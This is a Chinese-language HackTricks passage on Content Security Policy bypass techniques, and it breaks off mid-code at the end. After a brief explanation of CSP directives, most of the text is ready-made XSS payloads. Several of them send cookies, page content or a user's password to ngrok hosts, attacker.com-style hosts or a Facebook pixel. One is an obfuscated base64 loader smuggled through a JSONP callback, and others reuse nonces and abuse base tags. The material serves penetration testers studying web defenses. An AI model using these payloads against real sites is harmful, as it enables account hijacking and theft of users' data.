内容安全策略 (CSP) Bypass

Reading time: 41 minutes

tip

学习和实践 AWS 黑客技术：HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术：HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术：HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

查看 订阅计划!
加入 💬 Discord 群组 或 Telegram 群组 或在 Twitter 🐦 上关注我们 @hacktricks_live.
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。

什么是 CSP

内容安全策略 (CSP) 被视为一种浏览器技术，主要旨在抵御诸如跨站脚本 (XSS) 等攻击。它通过定义并详细说明浏览器可以安全加载资源的路径和来源来发挥作用。这些资源包括图像、框架和 JavaScript 等元素。例如，策略可能允许从同一域（self）加载和执行资源，包括内联资源，以及通过诸如 eval、setTimeout 或 setInterval 之类的函数执行字符串代码。

CSP 的实现通过 响应头 或在 HTML 页面中加入 meta 元素 来完成。遵循该策略后，浏览器会主动执行这些规定，并立即阻止任何被检测到的违规行为。

通过响应头实现：

Content-Security-policy: default-src 'self'; img-src 'self' allowed-website.com; style-src 'self';

通过 meta 标签实现：

xml

<meta http-equiv="Content-Security-Policy" content="default-src 'self'; img-src https://*; child-src 'none';">

响应头

CSP 可以通过以下响应头来强制执行或监控：

Content-Security-Policy: 强制执行 CSP；浏览器会阻止任何违规行为。
Content-Security-Policy-Report-Only: 用于监控；报告违规但不阻止。适合在预生产环境中进行测试。

定义资源

CSP 限制加载主动和被动内容的来源，控制诸如 inline JavaScript 的执行和 eval() 的使用等方面。示例策略如下：

bash

default-src 'none';
img-src 'self';
script-src 'self' https://code.jquery.com;
style-src 'self';
report-uri /cspreport
font-src 'self' https://addons.cdn.mozilla.net;
frame-src 'self' https://ic.paypal.com https://paypal.com;
media-src https://videos.cdn.mozilla.net;
object-src 'none';

指令

script-src: 允许 JavaScript 的特定来源，包括 URL、内联脚本，以及由事件处理器或 XSLT 样式表触发的脚本。
default-src: 当缺少特定抓取指令时，为获取资源设置默认策略。
child-src: 指定 web workers 和嵌入框架内容允许的资源。
connect-src: 限制可以通过 fetch、WebSocket、XMLHttpRequest 等接口加载的 URL。
frame-src: 限制用于框架的 URL。
frame-ancestors: 指定哪些来源可以嵌入当前页面，适用于诸如、、<object>、<embed> 和 <applet> 等元素。</li> <li><strong>img-src</strong>: 定义图像允许的来源。</li> <li><strong>font-src</strong>: 指定通过 <code>@font-face</code> 加载字体的有效来源。</li> <li><strong>manifest-src</strong>: 定义应用程序 manifest 文件的允许来源。</li> <li><strong>media-src</strong>: 定义加载媒体对象的允许来源。</li> <li><strong>object-src</strong>: 定义 <object>、<embed> 和 <applet> 元素的允许来源。</li> <li><strong>base-uri</strong>: 指定使用 <base> 元素加载时允许的 URL。</li> <li><strong>form-action</strong>: 列出表单提交的有效端点。</li> <li><strong>plugin-types</strong>: 限制页面可调用的 mime 类型。</li> <li><strong>upgrade-insecure-requests</strong>: 指示浏览器将 HTTP URL 重写为 HTTPS。</li> <li><strong>sandbox</strong>: 应用类似于 <iframe> 的 sandbox 属性的限制。</li> <li><strong>report-to</strong>: 指定在策略被违反时报告将发送到的组。</li> <li><strong>worker-src</strong>: 指定 Worker、SharedWorker 或 ServiceWorker 脚本的有效来源。</li> <li><strong>prefetch-src</strong>: 指定将被获取或预获取的资源的有效来源。</li> <li><strong>navigate-to</strong>: 限制文档可以通过任何方式导航到的 URL（a、form、window.location、window.open 等）。</li> </ul> <h3 id="sources"><a class="header" href="#sources">Sources</a></h3> <ul> <li><code>*</code>: 允许所有 URL，除了使用 <code>data:</code>、<code>blob:</code>、<code>filesystem:</code> 方案的。</li> <li><code>'self'</code>: 允许从相同域加载。</li> <li><code>'data'</code>: 允许通过 data 方案加载资源（例如 Base64 编码的图像）。</li> <li><code>'none'</code>: 阻止从任何来源加载。</li> <li><code>'unsafe-eval'</code>: 允许使用 <code>eval()</code> 和类似方法，出于安全原因不推荐使用。</li> <li><code>'unsafe-hashes'</code>: 启用特定的内联事件处理器。</li> <li><code>'unsafe-inline'</code>: 允许使用内联资源，如内联 <code><script></code> 或 <code><style></code>，出于安全原因不推荐使用。</li> <li><code>'nonce'</code>: 使用加密 nonce（一次性数字）对白名单内的特定内联脚本进行允许。</li> <li>如果你的 JS 执行受限，可以在页面内通过 <code>doc.defaultView.top.document.querySelector("[nonce]")</code> 获取已使用的 nonce，然后重用它来加载恶意脚本（如果使用了 strict-dynamic，任何被允许的来源都可以加载新的来源，因此此方法不必要），例如：</li> </ul> <details> <summary>重用 nonce 加载脚本</summary> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">html</span></div> <pre><code class="language-html"> <img src="x" ng-on-error=' doc=$event.target.ownerDocument; a=doc.defaultView.top.document.querySelector("[nonce]"); b=doc.createElement("script"); b.src="//example.com/evil.js"; b.nonce=a.nonce; doc.body.appendChild(b)' /> </code></pre> </details> <ul> <li><code>'sha256-<hash>'</code>: 将具有特定 sha256 哈希的脚本列入白名单。</li> <li><code>'strict-dynamic'</code>: 允许从任何源加载脚本，只要它已被 nonce 或 hash 列入白名单。</li> <li><code>'host'</code>: 指定特定主机，例如 <code>example.com</code>。</li> <li><code>https:</code>: 限制为使用 HTTPS 的 URL。</li> <li><code>blob:</code>: 允许从 Blob URL 加载资源（例如，通过 JavaScript 创建的 Blob URL）。</li> <li><code>filesystem:</code>: 允许从文件系统加载资源。</li> <li><code>'report-sample'</code>: 在违规报告中包含违规代码的示例（对调试有用）。</li> <li><code>'strict-origin'</code>: 类似于 'self'，但确保来源的协议安全级别与文档匹配（只有安全来源可以从安全来源加载资源）。</li> <li><code>'strict-origin-when-cross-origin'</code>: 在进行同源请求时发送完整 URL，但在跨域请求时仅发送 origin。</li> <li><code>'unsafe-allow-redirects'</code>: 允许加载会立即重定向到另一个资源的资源。不建议使用，因为它削弱了安全性。</li> </ul> <h2 id="不安全的-csp-规则"><a class="header" href="#不安全的-csp-规则">不安全的 CSP 规则</a></h2> <h3 id="unsafe-inline"><a class="header" href="#unsafe-inline">'unsafe-inline'</a></h3> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">yaml</span></div> <pre><code class="language-yaml">Content-Security-Policy: script-src https://google.com 'unsafe-inline'; </code></pre> <p>可用的 payload: <code>"/><script>alert(1);</script></code></p> <h4 id="self--unsafe-inline-via-iframes"><a class="header" href="#self--unsafe-inline-via-iframes">self + 'unsafe-inline' via Iframes</a></h4> <p><a class="content_ref" href="csp-bypass-self-+-unsafe-inline-with-iframes.html"><span class="content_ref_label">CSP bypass: self + 'unsafe-inline' with Iframes</span></a></p> <h3 id="unsafe-eval"><a class="header" href="#unsafe-eval">'unsafe-eval'</a></h3> <div class="mdbook-alerts mdbook-alerts-caution"> <p class="mdbook-alerts-title"> <span class="mdbook-alerts-icon"></span> caution </p> <p>这不起作用，更多信息请 <a href="https://github.com/HackTricks-wiki/hacktricks/issues/653"><strong>check this</strong></a>.</p> </div> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">yaml</span></div> <pre><code class="language-yaml">Content-Security-Policy: script-src https://google.com 'unsafe-eval'; </code></pre> <p>有效的 payload:</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">html</span></div> <pre><code class="language-html"><script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script> </code></pre> <h3 id="strict-dynamic"><a class="header" href="#strict-dynamic">strict-dynamic</a></h3> <p>如果你能以某种方式让一个<strong>被允许的 JS 代码在 DOM 中创建一个新的 script 标签</strong>（包含你的 JS 代码，因为是被允许的脚本创建的），那么<strong>新的 script 标签将被允许执行</strong>。</p> <h3 id="通配符-"><a class="header" href="#通配符-">通配符 (*)</a></h3> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">yaml</span></div> <pre><code class="language-yaml">Content-Security-Policy: script-src 'self' https://google.com https: data *; </code></pre> <p>有效的 payload:</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">html</span></div> <pre><code class="language-html">"/>'><script src=https://attacker-website.com/evil.js></script> "/>'><script src=data:text/javascript,alert(1337)></script> </code></pre> <h3 id="缺少-object-src-和-default-src"><a class="header" href="#缺少-object-src-和-default-src">缺少 object-src 和 default-src</a></h3> <blockquote> <p>[!CAUTION] > <strong>看起来这已不再有效</strong></p> </blockquote> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">yaml</span></div> <pre><code class="language-yaml">Content-Security-Policy: script-src 'self' ; </code></pre> <p>有效的 payloads:</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">html</span></div> <pre><code class="language-html"><object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object> ">'><object type="application/x-shockwave-flash" data='https: //ajax.googleapis.com/ajax/libs/yui/2.8.0 r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e) {alert(1337)}//'> <param name="AllowScriptAccess" value="always"></object> </code></pre> <h3 id="文件上传--self"><a class="header" href="#文件上传--self">文件上传 + 'self'</a></h3> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">yaml</span></div> <pre><code class="language-yaml">Content-Security-Policy: script-src 'self'; object-src 'none' ; </code></pre> <p>如果你可以上传一个 JS 文件，你就可以绕过这个 CSP：</p> <p>可用 payload:</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">html</span></div> <pre><code class="language-html">"/>'><script src="/uploads/picture.png.js"></script> </code></pre> <p>However, it's highly probable that the server is <strong>验证上传的文件</strong> and will only allow you to <strong>上传特定类型的文件</strong>。</p> <p>Moreover, even if you could upload a <strong>JS code inside</strong> a file using an extension accepted by the server (like: <em>script.png</em>) this won't be enough because some servers like apache server <strong>根据扩展名选择文件的 MIME type</strong> and browsers like Chrome will <strong>拒绝在应该是图片的文件中执行 Javascript</strong> 代码。 "Hopefully", 有时候会出错。比如，在一次 CTF 中我发现 <strong>Apache 不认识</strong> <em><strong>.wave</strong></em> 扩展，因此它不会以 <strong>MIME type like audio/</strong>* 来服务该文件。</p> <p>From here, if you find a XSS and a file upload, and you manage to find a <strong>被误判的扩展名</strong>, you could try to upload a file with that extension and the Content of the script. Or, if the server is checking the correct format of the uploaded file, create a polyglot (<a href="https://github.com/Polydet/polyglot-database">some polyglot examples here</a>).</p> <h3 id="form-action"><a class="header" href="#form-action">Form-action</a></h3> <p>If not possible to inject JS, you could still try to exfiltrate for example credentials <strong>injecting a form action</strong> (and maybe expecting password managers to auto-fill passwords). You can find an <a href="https://portswigger.net/research/stealing-passwords-from-infosec-mastodon-without-bypassing-csp"><strong>example in this report</strong></a>. Also, notice that <code>default-src</code> does not cover form actions.</p> <h3 id="third-party-endpoints--unsafe-eval"><a class="header" href="#third-party-endpoints--unsafe-eval">Third Party Endpoints + ('unsafe-eval')</a></h3> <div class="mdbook-alerts mdbook-alerts-warning"> <p class="mdbook-alerts-title"> <span class="mdbook-alerts-icon"></span> warning </p> <p>对于下面的一些 payload，<strong><code>unsafe-eval</code> 甚至都不需要</strong>。</p> </div> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">yaml</span></div> <pre><code class="language-yaml">Content-Security-Policy: script-src https://cdnjs.cloudflare.com 'unsafe-eval'; </code></pre> <p>加载易受攻击的 angular 版本并执行任意 JS：</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">xml</span></div> <pre><code class="language-xml"><script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js"></script> <div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1);//');}} </div> "><script src="https://cdnjs.cloudflare.com/angular.min.js"></script> <div ng-app ng-csp>{{$eval.constructor('alert(1)')()}}</div> "><script src="https://cdnjs.cloudflare.com/angularjs/1.1.3/angular.min.js"> </script> <div ng-app ng-csp id=p ng-click=$event.view.alert(1337)> With some bypasses from: https://blog.huli.tw/2022/08/29/en/intigriti-0822-xss-author-writeup/ <script/src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.js></script> <iframe/ng-app/ng-csp/srcdoc=" <script/src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.8.0/angular.js> </script> <img/ng-app/ng-csp/src/ng-o{{}}n-error=$event.target.ownerDocument.defaultView.alert($event.target.ownerDocument.domain)>" > </code></pre> <h4 id="payloads-使用-angular--一个包含返回-window-对象-的-库-check-out-this-post"><a class="header" href="#payloads-使用-angular--一个包含返回-window-对象-的-库-check-out-this-post">Payloads 使用 Angular + 一个包含返回 <code>window</code> 对象的库 (<a href="https://blog.huli.tw/2022/09/01/en/angularjs-csp-bypass-cdnjs/">check out this post</a>):</a></h4> <div class="mdbook-alerts mdbook-alerts-tip"> <p class="mdbook-alerts-title"> <span class="mdbook-alerts-icon"></span> tip </p> <p>该文章展示你可以从 <code>cdn.cloudflare.com</code>（或任何其他允许的 JS libraries repo）<strong>加载</strong>所有<strong>库</strong>，执行每个库中添加的所有函数，并检查 <strong>哪些库的哪些函数返回 <code>window</code> 对象</strong>。</p> </div> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">html</span></div> <pre><code class="language-html"><script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.8/angular.js" /></script> <div ng-app ng-csp> {{$on.curry.call().alert(1)}} {{[].empty.call().alert([].empty.call().document.domain)}} {{ x = $on.curry.call().eval("fetch('http://localhost/index.php').then(d => {})") }} </div> <script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.js"></script> <div ng-app ng-csp> {{$on.curry.call().alert('xss')}} </div> <script src="https://cdnjs.cloudflare.com/ajax/libs/mootools/1.6.0/mootools-core.min.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.js"></script> <div ng-app ng-csp> {{[].erase.call().alert('xss')}} </div> </code></pre> <p>Angular XSS 来源于类名：</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">html</span></div> <pre><code class="language-html"><div ng-app> <strong class="ng-init:constructor.constructor('alert(1)')()">aaa</strong> </div> </code></pre> <h4 id="abusing-google-recaptcha-js-code"><a class="header" href="#abusing-google-recaptcha-js-code">Abusing google recaptcha JS code</a></h4> <p>根据 <a href="https://blog-huli-tw.translate.goog/2023/07/28/google-zer0pts-imaginary-ctf-2023-writeup/?_x_tr_sl=es&_x_tr_tl=en&_x_tr_hl=es&_x_tr_pto=wapp#noteninja-3-solves"><strong>this CTF writeup</strong></a> 你可以在 CSP 内滥用 <a href="https://www.google.com/recaptcha/">https://www.google.com/recaptcha/</a> 来执行任意 JS 代码，从而绕过 CSP：</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">html</span></div> <pre><code class="language-html"><div ng-controller="CarouselController as c" ng-init="c.init()" > &#91[c.element.ownerDocument.defaultView.parent.location="http://google.com?"+c.element.ownerDocument.cookie]] <div carousel><div slides></div></div> <script src="https://www.google.com/recaptcha/about/js/main.min.js"></script> </code></pre> <p>更多 <a href="https://joaxcar.com/blog/2024/02/19/csp-bypass-on-portswigger-net-using-google-script-resources/"><strong>payloads from this writeup</strong></a>:</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">html</span></div> <pre><code class="language-html"><script src="https://www.google.com/recaptcha/about/js/main.min.js"></script>  <img src="x" ng-on-error="$event.target.ownerDocument.defaultView.alert(1)" />  <img src="x" ng-on-error=' doc=$event.target.ownerDocument; a=doc.defaultView.top.document.querySelector("[nonce]"); b=doc.createElement("script"); b.src="//example.com/evil.js"; b.nonce=a.nonce; doc.body.appendChild(b)' /> </code></pre> <h4 id="滥用-wwwgooglecom-实现-open-redirect"><a class="header" href="#滥用-wwwgooglecom-实现-open-redirect">滥用 www.google.com 实现 open redirect</a></h4> <p>下列 URL 会重定向到 example.com（来源于 <a href="https://www.landh.tech/blog/20240304-google-hack-50000/">here</a>）：</p> <pre><code>https://www.google.com/amp/s/example.com/ </code></pre> <p>滥用 *.google.com/script.google.com</p> <p>可以滥用 Google Apps Script 在 script.google.com 内的页面接收信息。正如<a href="https://embracethered.com/blog/posts/2023/google-bard-data-exfiltration/">这篇报告</a>中所示。</p> <h3 id="第三方端点--jsonp"><a class="header" href="#第三方端点--jsonp">第三方端点 + JSONP</a></h3> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">http</span></div> <pre><code class="language-http">Content-Security-Policy: script-src 'self' https://www.google.com https://www.youtube.com; object-src 'none'; </code></pre> <p>像这种情况下，<code>script-src</code> 被设置为 <code>self</code>，并且某个被列入白名单的特定域名存在，可以使用 JSONP 绕过。JSONP 端点允许不安全的回调方法，使攻击者能够执行 XSS。可用的 payload：</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">html</span></div> <pre><code class="language-html">"><script src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert#1"></script> "><script src="/api/jsonp?callback=(function(){window.top.location.href=`http://f6a81b32f7f7.ngrok.io/cooookie`%2bdocument.cookie;})();//"></script> </code></pre> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">html</span></div> <pre><code class="language-html">https://www.youtube.com/oembed?callback=alert; <script src="https://www.youtube.com/oembed?url=http://www.youtube.com/watch?v=bDOYN-6gdRE&format=json&callback=fetch(`/profile`).then(function f1(r){return r.text()}).then(function f2(txt){location.href=`https://b520-49-245-33-142.ngrok.io?`+btoa(txt)})"></script> </code></pre> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">html</span></div> <pre><code class="language-html"><script type="text/javascript" crossorigin="anonymous" src="https://accounts.google.com/o/oauth2/revoke?callback=eval(atob(%27KGZ1bmN0aW9uKCl7CiBsZXQgdnIgPSAoKT0%2Be3dpdGgobmV3IHRvcFsnVydbJ2NvbmNhdCddKCdlYicsJ1MnLCdjZycmJidvY2snfHwncGsnLCdldCcpXSgndydbJ2NvbmNhdCddKCdzcycsJzpkZWZkZWYnLCdsaScsJ3ZlY2hhdGknLCduYycsJy4nfHwnOycsJ25ldHdvcmtkZWZjaGF0cGlwZWRlZjAyOWRlZicpWydzcGxpdCddKCdkZWYnKVsnam9pbiddKCIvIikpKShvbm1lc3NhZ2U9KGUpPT5uZXcgRnVuY3Rpb24oYXRvYihlWydkYXRhJ10pKS5jYWxsKGVbJ3RhcmdldCddKSl9O25hdmlnYXRvclsnd2ViZHJpdmVyJ118fChsb2NhdGlvblsnaHJlZiddWydtYXRjaCddKCdjaGVja291dCcpJiZ2cigpKTsKfSkoKQ%3D%3D%27));"></script> </code></pre> <p><a href="https://github.com/zigoo0/JSONBee"><strong>JSONBee</strong></a> <strong>包含可用于不同网站 CSP bypass 的现成 JSONP endpoints。</strong></p> <p>If the initial endpoint is trusted, redirects are trusted.<br /> 如果 <strong>trusted endpoint 包含 Open Redirect</strong>，同样的漏洞也会发生，因为一旦初始 endpoint 被信任，redirects 也会被信任。</p> <h3 id="第三方滥用"><a class="header" href="#第三方滥用">第三方滥用</a></h3> <p>如 <a href="https://sensepost.com/blog/2023/dress-code-the-talk/#bypasses">following post</a> 所述，存在许多第三方域名可能在某处被包含在 CSP 中，可以被滥用来 exfiltrate 数据或执行 JavaScript 代码。以下是其中一些第三方：</p> <div class="table-wrapper"><table><thead><tr><th>实体</th><th>允许的域名</th><th>能力</th></tr></thead><tbody> <tr><td>Facebook</td><td>www.facebook.com, *.facebook.com</td><td>Exfil</td></tr> <tr><td>Hotjar</td><td>*.hotjar.com, ask.hotjar.io</td><td>Exfil</td></tr> <tr><td>Jsdelivr</td><td>*.jsdelivr.com, cdn.jsdelivr.net</td><td>Exec</td></tr> <tr><td>Amazon CloudFront</td><td>*.cloudfront.net</td><td>Exfil, Exec</td></tr> <tr><td>Amazon AWS</td><td>*.amazonaws.com</td><td>Exfil, Exec</td></tr> <tr><td>Azure Websites</td><td>*.azurewebsites.net, *.azurestaticapps.net</td><td>Exfil, Exec</td></tr> <tr><td>Salesforce Heroku</td><td>*.herokuapp.com</td><td>Exfil, Exec</td></tr> <tr><td>Google Firebase</td><td>*.firebaseapp.com</td><td>Exfil, Exec</td></tr> </tbody></table> </div> <p>如果您在目标的 CSP 中发现了任何上述允许域名，很可能可以通过在该第三方服务上注册来 bypass CSP，并将数据 exfiltrate 到该服务，或执行代码。</p> <p>例如，如果您发现以下 CSP：</p> <pre><code>Content-Security-Policy: default-src 'self’ www.facebook.com; </code></pre> <p>或</p> <pre><code>Content-Security-Policy: connect-src www.facebook.com; </code></pre> <p>你应该能够 exfiltrate data，类似于以前使用 <a href="https://www.humansecurity.com/tech-engineering-blog/exfiltrating-users-private-data-using-google-analytics-to-bypass-csp">Google Analytics</a>/<a href="https://blog.deteact.com/csp-bypass/">Google Tag Manager</a> 所做的。在本例中，按照以下一般步骤：</p> <ol> <li>在此创建一个 Facebook Developer 帐户。</li> <li>创建一个新的 "Facebook Login" 应用并选择 "Website"。</li> <li>转到 "Settings -> Basic" 并获取你的 "App ID"。</li> <li>在你想要从中 exfiltrate data 的目标站点上，可以直接使用 Facebook SDK 小工具 "fbq"，通过触发一个 "customEvent" 并携带数据负载来 exfiltrate data。</li> <li>进入你的 App 的 "Event Manager" 并选择你创建的应用（注意 event manager 可能位于类似于此 URL: https://www.facebook.com/events_manager2/list/pixel/[app-id]/test_events）。</li> <li>选择 "Test Events" 选项卡以查看由 "your" web site 发送的事件。</li> </ol> <p>然后，在受害者端，你执行以下代码来初始化 Facebook tracking pixel，使其指向攻击者的 Facebook developer account app-id 并发出如下 custom event：</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">JavaScript</span></div> <pre><code class="language-JavaScript">fbq('init', '1279785999289471'); // this number should be the App ID of the attacker's Meta/Facebook account fbq('trackCustom', 'My-Custom-Event',{ data: "Leaked user password: '"+document.getElementById('user-password').innerText+"'" }); </code></pre> <p>至于前面表中列出的另外七个第三方域名，你还可以用许多其他方式滥用它们。有关其他第三方滥用的更多说明，请参考之前的 <a href="https://sensepost.com/blog/2023/dress-codethe-talk/#bypasses">blog post</a>。</p> <h3 id="通过-rpo-relative-path-overwrite"><a class="header" href="#通过-rpo-relative-path-overwrite">通过 RPO (Relative Path Overwrite) <a href="#bypass-via-rpo-relative-path-overwrite" id="bypass-via-rpo-relative-path-overwrite"></a></a></h3> <p>除了前面提到的通过重定向绕过路径限制的方法之外，还有另一种在某些服务器上可用的技术，称为 Relative Path Overwrite (RPO)。</p> <p>例如，如果 CSP 允许路径 <code>https://example.com/scripts/react/</code>，则可以按如下方式绕过：</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">html</span></div> <pre><code class="language-html"><script src="https://example.com/scripts/react/..%2fangular%2fangular.js"></script> </code></pre> <p>浏览器最终会加载 <code>https://example.com/scripts/angular/angular.js</code>。</p> <p>之所以会这样，是因为对于浏览器来说，你正在从 <code>https://example.com/scripts/react/</code> 下加载名为 <code>..%2fangular%2fangular.js</code> 的文件，这符合 CSP。</p> <p>因此，浏览器会对其进行解码，实际请求 <code>https://example.com/scripts/react/../angular/angular.js</code>，这等同于 <code>https://example.com/scripts/angular/angular.js</code>。</p> <p>通过<strong>利用浏览器与服务器在 URL 解释上的不一致，可以绕过路径规则</strong>。</p> <p>解决方法是在服务器端不要将 <code>%2f</code> 当作 <code>/</code> 来处理，确保浏览器与服务器之间的解释一致以避免该问题。</p> <p>Online Example:<a href="https://jsbin.com/werevijewa/edit?html,output"> </a><a href="https://jsbin.com/werevijewa/edit?html,output">https://jsbin.com/werevijewa/edit?html,output</a></p> <h3 id="iframes-js-执行"><a class="header" href="#iframes-js-执行">Iframes JS 执行</a></h3> <p><a class="content_ref" href="../xss-cross-site-scripting/iframes-in-xss-and-csp.html"><span class="content_ref_label">Iframes in XSS, CSP and SOP</span></a></p> <h3 id="缺少-base-uri"><a class="header" href="#缺少-base-uri">缺少 <strong>base-uri</strong></a></h3> <p>如果缺少 <strong>base-uri</strong> 指令，你可以滥用它来执行 <a href="../dangling-markup-html-scriptless-injection/index.html"><strong>dangling markup injection</strong></a>。</p> <p>此外，如果<strong>页面正在使用相对路径加载脚本</strong>（例如 <code><script src="/js/app.js"></code>）并使用 <strong>Nonce</strong>，你可以滥用 <strong>base</strong> <strong>tag</strong> 使其<strong>从你的服务器加载该脚本，从而实现 XSS。</strong><br /> 如果易受攻击的页面是通过 <strong>httpS</strong> 加载的，请在 base 中使用一个 httpS url。</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">html</span></div> <pre><code class="language-html"><base href="https://www.attacker.com/" /> </code></pre> <h3 id="angularjs-事件"><a class="header" href="#angularjs-事件">AngularJS 事件</a></h3> <p>一种称为 Content Security Policy (CSP) 的策略可能会限制 JavaScript 事件。然而，AngularJS 提供了自定义事件作为替代。在事件中，AngularJS 提供了一个特殊对象 <code>$event</code>，它引用了原生浏览器的事件对象。这个 <code>$event</code> 对象可以被利用来绕过 CSP。值得注意的是，在 Chrome 中，<code>$event/event</code> 对象具有一个 <code>path</code> 属性，该属性包含一个对象数组，表示事件的执行链，而 <code>window</code> 对象总是位于数组的末端。这个结构对于 sandbox escape 策略至关重要。</p> <p>通过将该数组传递给 <code>orderBy</code> 过滤器，可以迭代它，并利用最后的元素（即 <code>window</code> 对象）触发全局函数，比如 <code>alert()</code>。下面的代码片段演示了这个过程：</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">xml</span></div> <pre><code class="language-xml"><input%20id=x%20ng-focus=$event.path|orderBy:%27(z=alert)(document.cookie)%27>#x ?search=<input id=x ng-focus=$event.path|orderBy:'(z=alert)(document.cookie)'>#x </code></pre> <p>该片段展示了如何使用 <code>ng-focus</code> 指令来触发事件，使用 <code>$event.path|orderBy</code> 操作 <code>path</code> 数组，并利用 <code>window</code> 对象执行 <code>alert()</code> 函数，从而暴露 <code>document.cookie</code>。</p> <p><strong>查找其他 Angular bypasses 在</strong> <a href="https://portswigger.net/web-security/cross-site-scripting/cheat-sheet"><strong>https://portswigger.net/web-security/cross-site-scripting/cheat-sheet</strong></a></p> <h3 id="angularjs-和-whitelisted-domain"><a class="header" href="#angularjs-和-whitelisted-domain">AngularJS 和 whitelisted domain</a></h3> <pre><code>Content-Security-Policy: script-src 'self' ajax.googleapis.com; object-src 'none' ;report-uri /Report-parsing-url; </code></pre> <p>在 Angular JS 应用中，为脚本加载白名单域的 CSP 策略可以通过调用 callback functions 和某些 vulnerable classes 被绕过。更多关于该技术的信息，请参见该 <a href="https://github.com/cure53/XSSChallengeWiki/wiki/H5SC-Minichallenge-3:-%22Sh*t,-it's-CSP!%22">git repository</a> 上的详细指南。</p> <p>有效的 payloads:</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">html</span></div> <pre><code class="language-html"><script src=//ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337></script> ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>  <script src="https://www.googleapis.com/customsearch/v1?callback=alert(1)"> </code></pre> <p>其他 JSONP 任意执行端点可以在 <a href="https://github.com/zigoo0/JSONBee/blob/master/jsonp.txt"><strong>here</strong></a> 找到（其中一些已被删除或修复）</p> <h3 id="通过重定向绕过"><a class="header" href="#通过重定向绕过">通过重定向绕过</a></h3> <p>当 CSP 遇到服务端重定向时会怎样？如果重定向指向一个未被允许的不同源，它仍然会失败。</p> <p>然而，根据 <a href="https://www.w3.org/TR/CSP2/#source-list-paths-and-redirects">CSP spec 4.2.2.3. Paths and Redirects</a> 的描述，如果重定向指向不同的路径，它可以绕过原有的限制。</p> <p>下面是一个示例：</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">html</span></div> <pre><code class="language-html"><!DOCTYPE html> <html> <head> <meta http-equiv="Content-Security-Policy" content="script-src http://localhost:5555 https://www.google.com/a/b/c/d" /> </head> <body> <div id="userContent"> <script src="https://https://www.google.com/test"></script> <script src="https://https://www.google.com/a/test"></script> <script src="http://localhost:5555/301"></script> </div> </body> </html> </code></pre> <p>如果 CSP 被设置为 <code>https://www.google.com/a/b/c/d</code>，因为路径会被考虑，<code>/test</code> 和 <code>/a/test</code> 的脚本都会被 CSP 阻止。</p> <p>然而，最终的 <code>http://localhost:5555/301</code> 会被<strong>在服务器端重定向到 <code>https://www.google.com/complete/search?client=chrome&q=123&jsonp=alert(1)//</code></strong>。由于这是重定向，<strong>路径不会被考虑</strong>，并且<strong>脚本可以被加载</strong>，从而绕过了路径限制。</p> <p>通过这种重定向，即使路径被完整指定，仍然可以被绕过。</p> <p>因此，最佳的解决方案是确保网站不存在任何 open redirect 漏洞，并且 CSP 规则中没有可被利用的域名。</p> <h3 id="bypass-csp-with-dangling-markup"><a class="header" href="#bypass-csp-with-dangling-markup">Bypass CSP with dangling markup</a></h3> <p>阅读 <a href="../dangling-markup-html-scriptless-injection/index.html">how here</a>。</p> <h3 id="unsafe-inline-img-src--via-xss"><a class="header" href="#unsafe-inline-img-src--via-xss">'unsafe-inline'; img-src *; via XSS</a></h3> <pre><code>default-src 'self' 'unsafe-inline'; img-src *; </code></pre> <p><code>'unsafe-inline'</code> 表示你可以在代码内部执行任意脚本（XSS 可以执行代码），而 <code>img-src *</code> 表示网页可以使用来自任意资源的图片。</p> <p>你可以绕过这个 CSP 通过 exfiltrating the data via images（在此场景中，XSS 滥用一个 CSRF：bot 可访问的页面包含一个 SQLi，并通过图片提取 flag）：</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">javascript</span></div> <pre><code 